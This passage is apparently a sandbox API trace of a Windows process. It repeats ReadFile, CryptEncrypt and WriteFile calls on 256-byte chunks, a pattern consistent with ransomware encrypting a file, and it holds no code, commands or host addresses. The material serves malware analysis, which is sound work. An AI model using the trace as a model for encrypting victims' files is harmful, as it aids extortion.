lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.407] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.407] GetLastError () returned 0x0 [0172.407] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.407] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.407] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.407] GetLastError () returned 0x0 [0172.407] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.407] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.407] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.407] GetLastError () returned 0x0 [0172.407] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.407] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.407] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.407] GetLastError () returned 0x0 [0172.407] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.407] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.407] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.408] GetLastError () returned 0x0 [0172.408] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.408] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.408] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.408] GetLastError () returned 0x0 [0172.408] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.408] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.408] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.408] GetLastError () returned 0x0 [0172.408] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.408] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.408] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.408] GetLastError () returned 0x0 [0172.408] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.408] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.408] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.408] GetLastError () returned 0x0 [0172.408] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.408] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.408] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.408] GetLastError () returned 0x0 [0172.408] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.408] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.408] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.408] GetLastError () returned 0x0 [0172.408] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.408] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.409] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.409] GetLastError () returned 0x0 [0172.409] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.409] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.409] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.409] GetLastError () returned 0x0 [0172.409] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.409] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.409] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.409] GetLastError () returned 0x0 [0172.409] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.409] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.409] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.409] GetLastError () returned 0x0 [0172.409] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.409] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.409] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.409] GetLastError () returned 0x0 [0172.409] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.409] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.409] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.409] GetLastError () returned 0x0 [0172.409] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.409] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.410] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.410] GetLastError () returned 0x0 [0172.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.410] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.410] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.410] GetLastError () returned 0x0 [0172.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.410] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.410] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.410] GetLastError () returned 0x0 [0172.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.410] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.410] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.410] GetLastError () returned 0x0 [0172.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.410] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.410] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.410] GetLastError () returned 0x0 [0172.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.410] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.410] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.410] GetLastError () returned 0x0 [0172.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.411] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.411] GetLastError () returned 0x0 [0172.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.411] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.411] GetLastError () returned 0x0 [0172.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.411] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.411] GetLastError () returned 0x0 [0172.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.411] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.411] GetLastError () returned 0x0 [0172.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.411] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.411] GetLastError () returned 0x0 [0172.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.411] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.411] GetLastError () returned 0x0 [0172.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.412] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.412] GetLastError () returned 0x0 [0172.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.412] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.412] GetLastError () returned 0x0 [0172.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.412] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, 